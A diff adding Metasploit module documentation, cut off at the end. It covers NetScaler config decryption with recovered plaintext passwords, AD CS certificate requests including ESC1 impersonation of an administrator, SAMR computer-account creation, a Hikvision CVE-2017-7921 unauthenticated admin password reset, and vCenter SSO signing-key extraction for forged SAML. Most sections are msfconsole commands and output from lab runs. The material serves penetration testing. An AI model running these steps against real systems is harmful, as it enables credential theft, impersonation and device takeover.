+add authentication ldapAction LDAP -serverName ldap.cesium137.io -serverPort 636 -ldapBase "DC=chainheart,DC=com" -ldapBindDn wiz@cesium137.io -ldapBindDnPassword f5dc75680b925dbd3c0a8154c8fee056bfe77ac774797de3c0867d368bd09c2cdd872a36e15a1f07abf773740e2c8a12 -encrypted -encryptmethod ENCMTHD_3 -ldapLoginName sAMAccountName -groupAttrName memberOf -secType SSL -ldapHostname ldap.cesium137.io
+[+] User: wiz@cesium137.io
+[+] Pass: 2AxDGAhirQWuuGxFpSq9ehFwny81RSm
+[*] Config line:
+set ns rpcNode 10.100.10.11 -password 9ec84444b10941dc4222f93b29a75f0aa237ffdcc73a81355bf5d1cf3d80058daaad7ca58e488e54bc3ff3eea8ffd9eb -encrypted -encryptmethod ENCMTHD_3 -srcIP 10.100.10.11
+[+] Plaintext: 447a325517739063bbaa414ecf1d9c3
+[*] Config line:
+set ns rpcNode 10.100.10.12 -password dd5c0c4952509e2fcfaeb238dfc361b79a844df09254087920ee0cf4dc447161bde8491d8a39ded0fa2526cc46e6a00f -encrypted -encryptmethod ENCMTHD_3 -srcIP 10.100.10.11
+[+] Plaintext: 447a325517739063bbaa414ecf1d9c3
+[*] Config line:
+add lb monitor mon_ldaps LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password e209865546c3d2e8462e3e7a962252eb6d9e26374163c8d902fc3535cb12638c514765dcea4792eb1e3e6b5e1c1c4cef -encrypted -encryptmethod ENCMTHD_3 -LRTM DISABLED -secure YES -baseDN "DC=chainheart,DC=com" -bindDN wiz@cesium137.io -filter CN=builtin
+[+] User: wiz@cesium137.io
+[+] Pass: 2AxDGAhirQWuuGxFpSq9ehFwny81RSm
+[*] Config line:
+add lb monitor mon_ldap LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password 4ae7bec92e25d985df315e543b846b2c30346840d8e945f5073832c3e479d60eee581f67d671759ae555210529eaec8d -encrypted -encryptmethod ENCMTHD_3 -LRTM DISABLED -destPort 636 -secure YES -baseDN "DC=chainheart,DC=com" -bindDN wiz@cesium137.io -filter CN=builtin
+[+] User: wiz@cesium137.io
+[+] Pass: 2AxDGAhirQWuuGxFpSq9ehFwny81RSm
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > 
+```
+
+Example run against config file using KEK from NetScaler VPX running NS13.0 Build 85.15.nc:
+
+```
+msf6 > use modules/auxiliary/admin/citrix/citrix_netscaler_config_decrypt
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_conf /tmp/ns.conf 
+ns_conf => /tmp/ns.conf
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_kek_f1 /tmp/F1.key
+ns_kek_f1 => /tmp/F1.key
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > set ns_kek_f2 /tmp/F2.key
+ns_kek_f2 => /tmp/F2.key
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > dump
+
+[*] Building NetScaler KEK from key fragments ...
+[+] NS KEK F1
+[+]      HEX: dd2588bb3cb20dd643216c33489776c78e8c56f13b1301e0984dc80564eea49e
+[+] NS KEK F2
+[+]      HEX: 45f9e6780a1dc40b6fe75bedf2f6dbb9a86e4315d07313014fe2381c52e44d8f
+[+] Assembled NS KEK AES key
+[+]      HEX: 54f202b9a94649fd9eaa3f13eab514a5a267f460db0a2393f8b25f321a7d79e0
+
+[*] Config line:
+add ssl certKey netscaler_cesium137_io -cert netscaler_cesium137_io.pem -key netscaler_cesium137_io.key 30f39257d8aacc737182568184e0d535002d90a7aba3454c1e8766a958d3a4a720e485c498adc681f0e7559ff633f932 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor DISABLED
+[+] Plaintext: zgkEUD86rUv76coT0DkIBj1xlp5qEzH
+[*] Config line:
+add ssl certKey ldap_cesium137_io -cert ldap_cesium137_io.pem -key ldap_cesium137_io.key d7902778370c616480ef781c5b3922ef31bd90e75dd3aecfa0fa8a5bafc4fa16b20ed2f7a07970c3f4d8ba201a3b9b72 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor ENABLED -notificationPeriod 90
+[+] Plaintext: YaqoRLtSnnMPgnWyhAedYv2RO1aVtx8
+[*] Config line:
+add ssl certKey mail_cesium137_io -cert mail_cesium137_io-g3.pem -key mail_cesium137_io-g3.key 0e5ca2011772a9943c8f4281668b7236a8dfb97da290487d1953fa5ef768272f33d20122b055878729c75c29efaa3291 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor DISABLED
+[+] Plaintext: TBkrkfnP4QOWIT0FX8QCLl2GkNrnM
+[*] Config line:
+add ssl certKey auth_cesium137_io -cert auth_cesium137_io-g3.pem -key auth_cesium137_io-g3.key d574cca92065da27309ce87a423ac82e0c1571cd4c6df59a725f7eabee97d40136a250152506cb15962e34c90f1dc25c -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -expiryMonitor DISABLED
+[+] Plaintext: flEkB3SW4YTTi9HRNnffmvJLSgJhsz5
+[*] Config line:
+set ns encryptionParams -method AES256 -keyValue ec5d48485c6871d1d4a2b01f9126946c53aa49eae721c8114ba7a34a1b1f8eabd443a9d641bbf5ef67f2b0237c481673587846db5378f72f9025f0762f8f9cbeebf4a16aaa2782d5c6ecd90c48a1c30d -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35
+[+] Plaintext: AAAAAAXyju437Ecnb/iQpa55uUvOskx7S5hCq5dB4kMq+Lcx6g==
+[*] Config line:
+add authentication radiusAction APP01_DUO -serverIP 10.100.10.13 -serverPort 11812 -authTimeout 60 -radKey 535587632ffe91f2559fcf5902c7e4bf24961ee2e7f6285c03c87c2e65165fbc -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -accounting ON
+[+] Plaintext: IAmSam!
+[*] Config line:
+add authentication radiusAction APP01_DUO_CITRIXRECEIVER -serverIP 10.100.10.13 -serverPort 21812 -authTimeout 60 -radKey 6644f481004ac7dee5a05b5a8dc3d9d9ae8c76f5fe82e0430b43acd7fb5afe9c -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -accounting ON
+[+] Plaintext: IAmSam!
+[*] Config line:
+add authentication ldapAction AD_DUA2FAUSERS -serverName ldap.cesium137.io -serverPort 636 -authTimeout 60 -ldapBase "DC=cesium137,DC=io" -ldapBindDn ldap@cesium137.io -ldapBindDnPassword 7fbbf2ef9665641264406c17673c0cdb5774b76454f3ac8c7bb067dd0d2228c5 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -ldapLoginName sAMAccountName -searchFilter "&(objectCategory=user)(memberOf=CN=2FA-OWA,CN=Users,DC=cesium137,DC=io)" -groupAttrName memberOf -subAttributeName cn -secType SSL -passwdChange ENABLED -nestedGroupExtraction ON -groupNameIdentifier sAMAccountName -groupSearchAttribute memberOf -groupSearchSubAttribute CN
+[+] User: ldap@cesium137.io
+[+] Pass: Gr33n3gg$
+[*] Config line:
+set ns rpcNode 192.168.10.14 -password 2634fa338c457cb32fdf245873874a9b8fcd7128f6534641f49ea650e9f0974b -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -srcIP 192.168.10.14
+[+] Plaintext: SamIAm!
+[*] Config line:
+set ns rpcNode 192.168.10.15 -password 6955e686fc5dd3beee5013dad0e0fa6510a56029b52cc7d7ed15082a60ec6ce4 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -srcIP 192.168.10.14
+[+] Plaintext: SamIAm!
+[*] Config line:
+add lb monitor mon_ldaps LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password cc1f6bb054f5d63d5eb871fdd36ff573f3343c1e0238965682460c6f084d1e14-encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -LRTM DISABLED -secure YES -baseDN "DC=cesium137,DC=io" -bindDN ldap@cesium137.io -filter CN=builtin -devno 13862
+[+] User: ldap@cesium137.io
+[+] Pass: Gr33n3gg$
+[*] Config line:
+add lb monitor mon_ldap LDAP -scriptName nsldap.pl -dispatcherIP 127.0.0.1 -dispatcherPort 3013 -password 5c35e0aa5c3d999e9ff10de1fa32910f9ac28b1ee8824c2301ac964e1f5f987e-encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35 -LRTM DISABLED -destPort 636 -secure YES -baseDN "DC=cesium137,DC=io" -bindDN ldap@cesium137.io -filter CN=builtin -devno 13863
+[+] User: ldap@cesium137.io
+[+] Pass: Gr33n3gg$
+[*] Config line:
+add lb monitor mon-radius RADIUS -respCode 2 -userName ldap -password fda3a1c5990558d4bfae059f27191f4c91a2dfa826d7318db287e109f5da39f9 -encrypted -encryptmethod ENCMTHD_3 -kek -suffix 2022_05_18_14_00_35  -LRTM DISABLED -resptimeout 4 -destPort 1812 -devno 13864
+[+] User: ldap
+[+] Pass: Gr33n3gg$
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/citrix/citrix_netscaler_config_decrypt) > 
+```
@@ -0,0 +1,139 @@
+## Vulnerable Application
+Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate
+template's configuration the resulting certificate can be used for various operations such as authentication.
+PFX certificate files that are saved are encrypted with a blank password.
+
+## Verification Steps
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/icpr_cert`
+3. Set the `CA`, `RHOSTS`, `SMBUser` and `SMBPass` options
+4. Run the module and see that a new certificate was issued or submitted
+
+## Options
+
+### CA
+The target certificate authority. The default value used by AD CS is `$domain-DC-CA`.
+
+### CERT_TEMPLATE
+The certificate template to issue, e.g. "User".
+
+### ALT_DNS
+Alternative DNS name to specify in the certificate. Useful in certain attack scenarios.
+
+### ALT_UPN
+Alternative User Principal Name (UPN) to specify in the certificate. Useful in certain attack scenarios. This is in the
+format `$username@$dnsDomainName`.
+
+## Actions
+
+### REQUEST_CERT
+Request a certificate. The certificate PFX file will be stored on success. The certificate file's password is blank.
+
+## Scenarios
+
+### Obtaining Configuration Values
+For this module to work, it's necessary to know the name of a CA and certificate template. These values can be obtained
+by a normal user via LDAP.
+
+```
+msf6 > use auxiliary/gather/ldap_query 
+msf6 auxiliary(gather/ldap_query) > set BIND_DN aliddle@msflab.local
+BIND_DN => aliddle@msflab.local
+msf6 auxiliary(gather/ldap_query) > set BIND_PW Password1!
+BIND_PW => Password1!
+msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_ADCS_CAS 
+ACTION => ENUM_ADCS_CAS
+msf6 auxiliary(gather/ldap_query) > run
+[*] Running module against 192.168.159.10
+
+[+] Successfully bound to the LDAP server!
+[*] Discovering base DN automatically
+[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
+CN=msflab-DC-CA CN=Enrollment Services CN=Public Key Services CN=Services CN=Configuration DC=msflab DC=local
+=============================================================================================================
+
+ Name                  Attributes
+ ----                  ----------
+ cacertificatedn       CN=msflab-DC-CA, DC=msflab, DC=local
+ certificatetemplates  ESC1-Test || Workstation || ClientAuth || DirectoryEmailReplication || DomainControllerAuthentication || KerberosAuthentication || EFSRecovery || EFS || DomainController || WebServer || Machine || User || SubCA |
+                       | Administrator
+ cn                    msflab-DC-CA
+ dnshostname           DC.msflab.local
+ name                  msflab-DC-CA
+
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/ldap_query) >
+```
+
+### Issue A Generic Certificate
+In this scenario, an authenticated user issues a certificate for themselves using the `User` template which is available
+by default. The user must know the CA name, which in this case is `msflab-DC-CA`.
+
+```
+msf6 > use auxiliary/admin/dcerpc/icpr_cert 
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
+SMBPass => Password1!
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
+CA => msflab-DC-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
+CERT_TEMPLATE => User
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 192.168.159.10
+
+[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
+[*] 192.168.159.10:445 - Binding to \cert...
+[+] 192.168.159.10:445 - Bound to \cert
+[*] 192.168.159.10:445 - Requesting a certificate...
+[+] 192.168.159.10:445 - The requested certificate was issued.
+[*] 192.168.159.10:445 - Certificate UPN: aliddle@msflab.local
+[*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1106
+[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20220824125053_default_unknown_windows.ad.cs_545696.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
+
+### Issue A Certificate With A Specific subjectAltName (AKA ESC1)
+In this scenario, an authenticated user exploits a misconfiguration allowing them to issue a certificate for a different
+User Principal Name (UPN), typically one that is an administrator. Exploiting this misconfiguration to specify a
+different UPN effectively issues a certificate that can be used to authenticate as another user.
+
+The user must know:
+
+* A vulnerable certificate template, in this case `ESC1-Test`.
+* The UPN of a target account, in this case `smcintyre@msflab.local`.
+
+See [Certified Pre-Owned](https://posts.specterops.io/certified-pre-owned-d95910965cd2) section on ESC1 for more
+information.
+
+```
+msf6 > use auxiliary/admin/dcerpc/icpr_cert 
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
+SMBPass => Password1!
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
+CA => msflab-DC-CA
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC1-Test
+CERT_TEMPLATE => ESC1-Test
+msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN smcintyre@msflab.local
+ALT_UPN => smcintyre@msflab.local
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 192.168.159.10
+
+[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
+[*] 192.168.159.10:445 - Binding to \cert...
+[+] 192.168.159.10:445 - Bound to \cert
+[*] 192.168.159.10:445 - Requesting a certificate...
+[+] 192.168.159.10:445 - The requested certificate was issued.
+[*] 192.168.159.10:445 - Certificate UPN: smcintyre@msflab.local
+[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20220824125859_default_unknown_windows.ad.cs_829589.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
@@ -0,0 +1,100 @@
+## Vulnerable Application
+Add, lookup and delete computer accounts via MS-SAMR. By default standard active directory users can add up to 10 new
+computers to the domain. Administrative privileges however are required to delete the created accounts.
+
+## Verification Steps
+
+1. From msfconsole
+2. Do: `use auxiliary/admin/dcerpc/samr_computer`
+3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
+   1. Set the `COMPUTER_NAME` option for `DELETE_COMPUTER` and `LOOKUP_COMPUTER` actions
+4. Run the module and see that a new machine account was added
+
+## Options
+
+### SMBDomain
+
+The Windows domain to use for authentication. The domain will automatically be identified if this option is left in its
+default value.
+
+### COMPUTER_NAME
+
+The computer name to add, lookup or delete. This option is optional for the `ADD_COMPUTER` action, and required for the
+`LOOKUP_COMPUTER` and `DELETE_COMPUTER` actions.
+
+### COMPUTER_PASSWORD
+
+The password for the new computer. This option is only used for the `ADD_COMPUTER` action. If left blank, a random value
+will be generated.
+
+## Actions
+
+### ADD_COMPUTER
+
+Add a new computer to the domain. This action will fail with status `STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED` if the
+user has exceeded the maximum number of computer accounts that they are allowed to create.
+
+After the computer account is created, the password will be set for it. If `COMPUTER_NAME` is set, that value will be
+used and the module will fail if the selected name is already in use. If `COMPUTER_NAME` is *not* set, a random value
+will be used.
+
+### DELETE_COMPUTER
+
+Delete a computer from the domain. This action requires that the `COMPUTER_NAME` option be set.
+
+### LOOKUP_COMPUTER
+
+Lookup a computer in the domain. This action verifies that the specified computer exists, and looks up its security ID
+(SID), which includes the relative ID (RID) as the last component.
+
+## Scenarios
+
+### Windows Server 2019
+
+First, a new computer account is created and its details are logged to the database.
+
+```
+msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser aliddle
+SMBUser => aliddle
+msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1
+SMBPass => Password1
+msf6 auxiliary(admin/dcerpc/samr_computer) > show options 
+
+Module options (auxiliary/admin/dcerpc/samr_computer):
+
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   COMPUTER_NAME                       no        The computer name
+   COMPUTER_PASSWORD                   no        The password for the new computer
+   RHOSTS             192.168.159.96   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT              445              yes       The target port (TCP)
+   SMBDomain          .                no        The Windows domain to use for authentication
+   SMBPass            Password1        no        The password for the specified username
+   SMBUser            aliddle          no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   ADD_COMPUTER  Add a computer account
+
+
+msf6 auxiliary(admin/dcerpc/samr_computer) > run
+[*] Running module against 192.168.159.96
+
+[*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
+[+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/samr_computer) > creds
+Credentials
+===========
+
+host            origin          service        public             private                           realm   private_type  JtR Format
+----            ------          -------        ------             -------                           -----   ------------  ----------
+192.168.159.96  192.168.159.96  445/tcp (smb)  DESKTOP-2X8F54QG$  MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY  MSFLAB  Password      
+
+msf6 auxiliary(admin/dcerpc/samr_computer) >
+```
@@ -0,0 +1,116 @@
+## Vulnerable Application
+
+Many Hikvision IP cameras contain improper authentication logic that allow unauthenticated impersonation of any
+configured user account. This allows an attacker to bypass all security on the camera and
+gain full admin access, allowing them to thereby completely control the camera and modify
+any setting or retrieve sensitive information.
+
+This module allows the attacker to perform an unauthenticated password change on
+any vulnerable Hikvision IP Camera by utilizing the improper authentication logic to
+send a request  to the server which contains an `auth` parameter in the query string
+containing a Base64 encoded version of the authorization in `username:password` format.
+Vulnerable cameras will ignore the `username` parameter and will instead use the username
+part of this string as the user to log in as. This can then be used to gain full 
+administrative access to the affected device.
+
+The vulnerability has been present in Hikvision products since 2014.
+In addition to Hikvision-branded devices, it affects many white-labeled
+camera products sold under a variety of brand names.
+
+Below is a list of vulnerable firmware, but many other white-labelled versions might be vulnerable.
+
+* DS-2CD2xx2F-I Series: V5.2.0 build 140721 to V5.4.0 build 160530
+* DS-2CD2xx0F-I Series: V5.2.0 build 140721 to V5.4.0 Build 160401
+* DS-2CD2xx2FWD Series: V5.3.1 build 150410 to V5.4.4 Build 161125
+* DS-2CD4x2xFWD Series: V5.2.0 build 140721 to V5.4.0 Build 160414
+* DS-2CD4xx5 Series: V5.2.0 build 140721 to V5.4.0 Build 160421
+* DS-2DFx Series: V5.2.0 build 140805 to V5.4.5 Build 160928
+* DS-2CD63xx Series: V5.0.9 build 140305 to V5.3.5 Build 160106
+
+Installing a vulnerable test bed requires a Hikvision camera with the vulnerable firmware loaded.
+
+This module has been tested against a Hikvision camera with the specifications listed below:
+
+* MANUFACTURER: Hikvision.China
+* MODEL: DS-2CD2142FWD-IS
+* FIRMWARE VERSION: V5.4.1
+* FIRMWARE RELEASE: build 160525
+* BOOT VERSION: V1.3.4
+* BOOT RELEASE: 100316
+
+## Verification Steps
+
+1. `use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set USERNAME <name of user>`
+1. `set PASSWORD <new password>`
+1. `check`
+1. `set ID <id of user whose password you want to reset from "check" output>`
+1. `run`
+1. You should get a message that the password for the user has been successfully changed.
+
+## Options
+### STORE_CRED
+This option allows you to store the user and password credentials in the Metasploit database for further use.
+
+## Scenarios
+
+### Hikvision DS-2CD2142FWD-IS Firmware Version V5.4.1 build 160525
+
+```
+msf6 > use auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set RHOSTS 192.168.100.180
+RHOSTS => 192.168.100.180
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set USERNAME admin
+USERNAME => admin
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set PASSWORD Pa$$W0rd
+PASSWORD => Pa$$W0rd
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set ID 1
+ID => 1
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > set STORE_CRED true
+STORE_CRED => true
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > options
+
+Module options (auxiliary/admin/http/hikvision_unauth_pwd_reset_cve_2017_7921):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   ID          1                yes       ID (default 1 for admin)
+   PASSWORD    Pa$$W0rd         yes       New Password (at least 2 UPPERCASE, 2 lowercase and 2 special characters
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS      192.168.100.180  yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploi
+                                          t
+   RPORT       80               yes       The target port (TCP)
+   SSL         false            no        Negotiate SSL/TLS for outgoing connections
+   STORE_CRED  true             no        Store credential into the database.
+   USERNAME    admin            yes       Username for password change
+   VHOST                        no        HTTP server virtual host
+
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > check
+
+[*] Following users are available for password reset...
+[*] USERNAME:admin | ID:1 | ROLE:Administrator
+[*] USERNAME:admln | ID:2 | ROLE:Operator
+[+] 192.168.100.180:80 - The target is vulnerable.
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) > run
+[*] Running module against 192.168.100.180
+
+[*] Following users are available for password reset...
+[*] USERNAME:admin | ID:1 | ROLE:Administrator
+[*] USERNAME:admln | ID:2 | ROLE:Operator
+[*] Starting the password reset for admin...
+[+] Password reset for admin was successfully completed!
+[*] Please log in with your new password: Pa$$W0rd
+[*] Credentials for admin were added to the database...
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset) > creds -O 192.168.100.180
+Credentials
+===========
+
+host             origin           service        public  private   realm  private_type  JtR Format
+----             ------           -------        ------  -------   -----  ------------  ----------
+192.168.100.180  192.168.100.180  80/tcp (http)  admin   Pa$$W0rd         Password
+
+msf6 auxiliary(admin/http/hikvision_unauth_pwd_reset_cve_2017_7921) 
+```
@@ -0,0 +1,98 @@
+Grab certificates from the vCenter server vmdird or vmafd database files and adds them to loot.
+This module will accept files from a live vCenter appliance or from a vCenter appliance backup
+archive; either or both files can be supplied to the module depending on the situation. The module
+will extract the vCenter SSO IdP signing credential from the vmdir database, which can be used to
+create forged SAML assertions and access the SSO directory as an administrator. The vmafd service
+contains the vCenter certificate store which from which the module will attempt to extract all vmafd
+certificates that also have a corresponding private key. Portions of this module are based on
+information published by Zach Hanley at Horizon3:
+
+https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/
+
+## Vulnerable Application
+This module is tested against the vCenter appliance but will probably work against Windows instances.
+It has been tested against files from vCenter appliance versions 6.5, 6.7, and 7.0. The module will
+work with files retrieved from a live vCenter system as well as files extracted from an unencrypted
+vCenter backup archive.
+
+## Verification Steps
+You must possess the vmdir and/or vmafd database files from vCenter in order to use this module. The
+files must be local to the system invoking the module. Where possible, you should provide the
+`VC_IP` option to tag relevant loot entries with the IPv4 address of the originating system. If no
+value is provided for `VC_IP` the module defaults to assigning the loopback IP `127.0.0.1`.
+
+1. Acquire the vmdir and/or vmafd database files from vCenter (see below)
+2. Start msfconsole
+3. Do: `use auxiliary/admin/vmware/vcenter_offline_mdb_extract`
+4. Do: `set vmdir_mdb <path to data.mdb>` if you are extracting from the vmdir database
+5. Do: `set vmafd_db <path to afd.db>` if you are extracting from the vmafd database
+6. Do: `set vc_ip <vCenter IPv4>` to attach the target vCenter IPv4 address to loot entries
+7. Do: `dump`
+
+## Options
+**VMDIR_MDB**
+
+Path to the vmdird MDB database file on the local system. Example: `/tmp/data.mdb`
+
+**VMAFD_DB**
+
+Path to the vmafd DB file on the local system. Example: `/tmp/afd.db`
+
+**VC_IP**
+
+Optional parameter to set the IPv4 address associated with loot entries made by the module.
+
+## Scenarios
+
+### Acquire Database Files
+This module targets the internal databases of vCenter vmdir (OpenLDAP Memory-Mapped Database) and
+vmafd (SQLite3). On a live vCenter appliance, these files can be downloaded with root access from
+the following locations:
+
+`vmdir: /storage/db/vmware-vmdir/data.mdb`
+`vmafd: /storage/db/vmware-vmafd/afd.db`
+    
+If you are extracting from a backup file, target files are available in the following archives:
+
+`vmdir: lotus_backup.tar.gz`
+`vmafd: config_files.tar.gz`
+
+### Running the Module
+Example run against database files extracted from vCenter appliance version 7.0 Update 3d:
+
+```
+msf6 > use auxiliary/admin/vmware/vcenter_offline_mdb_extract
+msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > set vmdir_mdb /tmp/data.mdb
+vmdir_mdb => /tmp/data.mdb
+msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > set vmafd_db /tmp/afd.db
+vmafd_db => /tmp/afd.db
+msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > set vc_ip 192.168.100.70
+vc_ip => 192.168.100.70
+msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > dump
+
+[*] Extracting vmwSTSTenantCredential from /tmp/data.mdb ...
+[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_idp_571080.key
+[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_idp_564729.pem
+[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_vmca_721819.pem
+[*] Extracting vSphere platform certificates from /tmp/afd.db ...
+[+] __MACHINE_CERT key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70___MACHINE_CERT_869237.key
+[+] __MACHINE_CERT cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70___MACHINE_CERT_240839.pem
+[+] DATA-ENCIPHERMENT key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_DATAENCIPHERMEN_350586.key
+[+] DATA-ENCIPHERMENT cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_DATAENCIPHERMEN_106169.pem
+[+] HVC key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_HVC_825963.key
+[+] HVC cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_HVC_399928.pem
+[+] MACHINE key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_MACHINE_995574.key
+[+] MACHINE cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_MACHINE_156797.pem
+[+] SMS_SELF_SIGNED key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_SMS_SELF_SIGNED_169524.key
+[+] SMS_SELF_SIGNED cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_SMS_SELF_SIGNED_230704.pem
+[+] VPXD key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VPXD_370336.key
+[+] VPXD cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VPXD_300599.pem
+[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VPXDEXTENSION_571196.key
+[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VPXDEXTENSION_088742.pem
+[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VSPHEREWEBCLIEN_060718.key
+[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VSPHEREWEBCLIEN_280013.pem
+[+] WCP key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_WCP_057402.key
+[+] WCP cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_WCP_909204.pem
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > 
+```
@@ -1,212 +1,131 @@
 ## Vulnerable Application

-The module use the Censys REST API to access the same data accessible through web interface.
-The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.
+The module uses the Censys REST API to access the same data accessible through
+the web interface. The search endpoint allows queries using the Censys Search
+Language against the Hosts dataset. Setting the CERTIFICATES option will also
